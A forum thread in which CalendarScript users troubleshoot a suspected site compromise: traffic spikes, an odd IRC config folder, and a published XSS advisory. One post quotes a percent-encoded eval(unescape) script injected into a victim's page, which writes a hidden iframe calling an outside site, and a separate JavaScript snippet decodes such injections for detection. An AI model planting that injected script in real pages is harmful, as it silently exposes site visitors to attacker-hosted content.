Please contact Matt (CalendarScript's author) directly via email with as much detail as you can. His email address is: matt@calendarscript.com
Dan O.
PS. Mention that you posted this message in the forum too so he can keep others informed of any problems by replying here.
------------------
Thanks for the advice; I just forwarded my post directly to Matt.
In the meantime, do you think that doing a fresh, clean, brand-new install of 3.2.1 would be helpful (as opposed to the patch, which is what I did before)?
I doubt it would correct any problems that might be present (if CS is actually the cause of the problem).
I would further suggest you keep the files that are already in place until you hear from Matt. Either that or archive the whole lot first into a .zip or .tar.gz file just in case he would like to check them.
** calendarscript > config > unrealircd.conf **
BTW. "config" is not part of the CalendarScript installation. You might want to check the server logs to see who, how and when that directory was created.
PS. Matt might be interested in your server logs as well.
On our site we have had what seems to be an excess number of hits on the calendar.pl and the calendar_admin.pl
In checking the folders there is (1) an ssi.txt file in the Calendar Script folder, and (2) ssi.html files (times 3) in the templates/calendars/default, ..../oldstyle, and .../simple folders.
No raven, or cgi file. We are running 3.21
Suggestions?
Really??? That is a part of the normal CalendarScript distribution as is ssi.html in each of the template directories.
If you've been in direct contact with Matt, I suggest you check with him again as to what you're supposed to be looking for. I can't see how those files would be of interest in regard to hack attempts.
JMO
Are you allowing your calendar to be spidered by Google, Yahoo and MSN, etc.? Those could rack up a hit for each and every date on every month on the calendar and they often will spider a site several times a day.
Did you look up exactly what IP address(es) are responsible for the excess number of hits?
BTW. A hack because of CalendarScript would not AFAIK show any excessive usage of either of those files. They would usually only be accessed once (maybe twice) to upload parasitic files to your server. From then on it would be those parasite files doing the work, not CalendarScript or its files.
http://securitytracker.com/alerts/2005/Apr/1013705.html
CalendarScript Discloses Installation Path and Debug Information to Remote Users and Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1013705
SecurityTracker URL: http://securitytracker.com/id?1013705
Date: Apr 14 2005
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 3.20, 3.21
Description: sNKenjoi reported several vulnerabilities in CalendarScript. A remote user can determine the installation path. A remote user can conduct cross-site scripting attacks. A remote user can also view debug information.
Just displaying path information is not a "problem".
This is a message I received from my server company, who looked into a problem
on one of my web sites this code was added to the index page
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%67%61%6d%65%34%61%6c%6c%2e%62%69%7a%2f%61%64% 76%2f%31%37%38%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
anyone have any idea what this is?
Do you? You really should have that looked into.
This forum however isn't the place to discuss it... unless you have CalendarScript installed on your server and it is responsible. IF it is, upgrade it!
** this code was added to the index page... anyone have any idea what this is? **
Unescape the string and see. It's code to launch an iframe within your page, which calls another web site.
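The "unescape the string and see" step can be done without ever running the script. The JavaScript below is an added example, not part of the original thread: it statically decodes `eval(unescape('...'))` blocks found in a page and reports any iframe they would write. The sample page and the `injected.example.invalid` host are constructed for illustration.

```javascript
// Added example: static triage of eval(unescape('...')) injections.
// The payload is only decoded as text; nothing is evaluated.

// Decode %XX and %uXXXX the way legacy unescape() does. Whitespace is stripped
// first, because pasted or mail-wrapped copies often gain stray spaces.
function staticUnescape(encoded) {
  return encoded
    .replace(/\s+/g, '')
    .replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
      (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Pull one attribute value out of a tag, quoted or unquoted.
function attr(tag, name) {
  const m = tag.match(new RegExp(name + '\\s*=\\s*["\']?([^\\s"\'>]+)', 'i'));
  return m ? m[1] : null;
}

// Report every eval(unescape(...)) call in the page and the iframes it writes.
function findInjectedScripts(html) {
  const call = /eval\s*\(\s*unescape\s*\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/gi;
  const findings = [];
  for (const m of html.matchAll(call)) {
    const decoded = staticUnescape(m[2]);
    const iframes = [];
    for (const f of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const w = attr(f[0], 'width');
      const h = attr(f[0], 'height');
      iframes.push({
        src: attr(f[0], 'src'),
        // A 0x0 or 1x1 frame is invisible to the visitor.
        hidden: (w !== null && Number(w) <= 1) || (h !== null && Number(h) <= 1),
      });
    }
    findings.push({ offset: m.index, decoded, iframes });
  }
  return findings;
}

// Constructed sample: a page with an injected, fully percent-encoded script.
const SAMPLE_PLAIN = "document.write('<iframe src=http://injected.example.invalid/x.php width=1 height=1></iframe>');";
const enc = Array.from(SAMPLE_PLAIN,
  (c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
// A space is inserted mid-token to mimic copy/paste damage.
const SAMPLE_PAGE = "<html><body><h1>Home</h1><script>eval(unescape('" +
  enc.slice(0, 31) + ' ' + enc.slice(31) + "'));</script></body></html>";

console.log(JSON.stringify(findInjectedScripts(SAMPLE_PAGE), null, 2));
```

Running the same function over every HTML and template file in the web root shows which pages carry the injection and which remote host each one points to.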
game4all.com is the same site I found an email address (to a PayPal link) and have written to the guy
my traffic tripled on one day.. my pageviews went from 2000 a day to 22000 (that's not an extra zero)..
This past month calendar.pl has gotten 680 visits (normal) and 41000 hits (normal is 8000).. so something is definitely up..
Most of my hits come from the following IPs:
64.127.124.147 (30520 hits this month)
152.99.75.130 (10806 hits this month)
I verified that I am running 3.21 .. I searched through the calendarscript folder and found nothing I saw as new.. Does anyone have any suggestions as to what to look for?
I searched filenames for the string "irc".. found nothing..
This very much concerns me..
-Jay
Maybe... but even if so, would have nothing to do with whether CalendarScript is a security risk (which BTW only allows other scripts to be uploaded to the server and has nothing to do with how much CalendarScript is called or runs on your server).
** Most of my hits come from the following IPs... **
Have you checked your access logs to see if you can find a referral for how they're getting there?
152.99.75.130 belongs to the Asia Pacific Network Information Centre. If your web site has no visitors from that part of the world, you could probably ban all access from any of their IP addresses from your server.